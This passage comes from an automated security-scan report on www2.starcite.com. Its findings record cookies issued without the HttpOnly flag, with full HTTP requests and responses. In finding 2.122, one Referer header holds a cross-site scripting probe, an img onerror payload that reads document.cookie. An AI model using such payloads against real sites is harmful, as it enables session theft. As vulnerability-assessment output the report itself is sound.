User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:15:50 GMT
ETag: "1000000003194-b623-47f3242a45180"
Accept-Ranges: bytes
Content-Length: 46627
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

GIF89a...........3.N...~.q]>...(.......{.!.}{|Z.:.......dX...8!
.c.\.......7..
...P$K...o..0*...........+P3........pp..X;..Z...@:>.tj.....j?+fff... .#.J%N* ...R.f..v.&<1. .n[..._=....:M.......Q..'M.
...[SNIP]...

2.108. http://www2.starcite.com/starcite/slideshow/images/rock-star_3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rock-star_3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rock-star_3.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:15:50 GMT
ETag: "1000000003195-85b5-47f3242a45180"
Accept-Ranges: bytes
Content-Length: 34229
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

GIF89a..7.........]. .o....p.t`N..pI>.......cA/..P2-..^k;0zXP....P%M)"3........p$4.dZ..}.uOJ !.QJ.>A.i^.bS8! .K;...{>/S9=................))..X.bK.WI.J?........tl.%.RA)......<%O..2#/.33.zg.uO....lR...N
...[SNIP]...

2.109. http://www2.starcite.com/starcite/slideshow/images/rssmall.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rssmall.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rssmall.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:24 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 19:50:45 GMT
ETag: "100000000319b-fbe3-47e2ab7d8af40"
Accept-Ranges: bytes
Content-Length: 64483
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

.PNG
.
...IHDR...<...<.....:..r....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.1/27/10A.sf....prVWx..Z...D..Y...?).r..l.m......4d.M(........
t".Tmq
...[SNIP]...

2.110. http://www2.starcite.com/starcite/slideshow/images/slide4small.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/slide4small.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/slide4small.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Sun, 25 Apr 2010 19:47:59 GMT
ETag: "10000000031f7-24ba-48514effcb9c0"
Accept-Ranges: bytes
Content-Length: 9402
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

.PNG
.
...IHDR...<...<.....:..r...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

2.111. http://www2.starcite.com/starcite/solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/solutions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/solutions HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=17
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:31 GMT;path=/
Content-Length: 13948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.112. http://www2.starcite.com/starcite/supplier-video/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/supplier-video/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/supplier-video/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:49 GMT
Server: Apache
Last-Modified: Wed, 06 Jan 2010 18:50:33 GMT
ETag: "1000000003131-938-47c836dedd976"
Accept-Ranges: bytes
Content-Length: 2360
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:15 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<title>Sta
...[SNIP]...

2.113. http://www2.starcite.com/starcite/suppliers/howitworks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/suppliers/howitworks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/suppliers/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:12 GMT;path=/
Content-Length: 25233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.114. http://www2.starcite.com/starcite/themes/garland/iestyle.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/iestyle.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/iestyle.css HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:29 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 20:21:54 GMT
ETag: "100000000319d-a7-47f58e6ddfc80"
Accept-Ranges: bytes
Content-Length: 167
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:55 GMT;path=/


       #slideshow-area {
       margin-left:0px;
       background:url('images/header_top-ie.png') no-repeat scroll 0 0;
       }
       #slideshow {
       margin:0 0 0 -5px;
       height:247px;
       }

2.115. http://www2.starcite.com/starcite/themes/garland/iestyle6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/iestyle6.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/iestyle6.css HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:29 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 20:27:16 GMT
ETag: "100000000319e-13e-47f58fa0f5100"
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:55 GMT;path=/

#slideshow #slidesContainer {
margin:0 auto;
width:949px;
height:257px;
overflow:auto; /* allow scrollbar */
position:relative;
}


       #slideshow-area {
       margin-left:5px;
       backgro
...[SNIP]...

2.116. http://www2.starcite.com/starcite/themes/garland/images/arrow_small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/arrow_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/arrow_small.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002c69-36b-455110eec1300"
Accept-Ranges: bytes
Content-Length: 875
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

GIF89a.....#...i.......................f........l.....`..............h..{....._...........N........S..r..S..Q..R........................................................................................
...[SNIP]...

2.117. http://www2.starcite.com/starcite/themes/garland/images/bg_image.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/bg_image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/bg_image.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:28 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 23:52:00 GMT
ETag: "1000000002c72-6e-454c4a8410800"
Accept-Ranges: bytes
Content-Length: 110
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:54 GMT;path=/

GIF89a..M....................................................!.......,......M......B+58g.......a.hz.l."p,.r..;

2.118. http://www2.starcite.com/starcite/themes/garland/images/block_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/block_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/block_bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:31 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2008 20:34:00 GMT
ETag: "1000000002c7c-10d-454716cc91e00"
Accept-Ranges: bytes
Content-Length: 269
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

GIF89a&.&....................................................!.......,....&.&......I..8....`(Nbi........!.tm.x..|>....H..H...l:...t).Z...vK.z...xL....0z.N....:N?O...~....~.........}.................
...[SNIP]...

2.119. http://www2.starcite.com/starcite/themes/garland/images/blue_bdr.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/blue_bdr.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/blue_bdr.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 12 Sep 2008 03:18:00 GMT
ETag: "1000000002c7e-257d-456aa5528aa00"
Accept-Ranges: bytes
Content-Length: 9597
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2008:09:11 10:54:02.........
...[SNIP]...

2.120. http://www2.starcite.com/starcite/themes/garland/images/blue_lbdr.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/blue_lbdr.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/blue_lbdr.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 12 Sep 2008 03:18:00 GMT
ETag: "1000000002c82-2247-456aa5528aa00"
Accept-Ranges: bytes
Content-Length: 8775
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2008:09:11 11:58:00.........
...[SNIP]...

2.121. http://www2.starcite.com/starcite/themes/garland/images/blue_rbdr.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/blue_rbdr.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/blue_rbdr.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:45 GMT
Server: Apache
Last-Modified: Fri, 12 Sep 2008 03:18:00 GMT
ETag: "1000000002c84-224d-456aa5528aa00"
Accept-Ranges: bytes
Content-Length: 8781
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2008:09:11 11:58:04.........
...[SNIP]...

2.122. http://www2.starcite.com/starcite/themes/garland/images/btn_continue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/btn_continue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/btn_continue.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __unam=2392472-12d471e5d4f-40cdc366-1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:08 GMT
Server: Apache
Last-Modified: Mon, 08 Sep 2008 20:42:00 GMT
ETag: "1000000002c98-47d-45668736db600"
Accept-Ranges: bytes
Content-Length: 1149
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:34 GMT;path=/

GIF89a[........!..!.. ..$..#..#.. ..............^..\..^.....A.....[..]..[..3...........P...........L..............j........|..m..2.....k..M..@..@..{..`..0..z..j..?.....4..M..=..2../..P..1..B..?..C....
...[SNIP]...

2.123. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_left.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/btn_sec_left.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/btn_sec_left.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
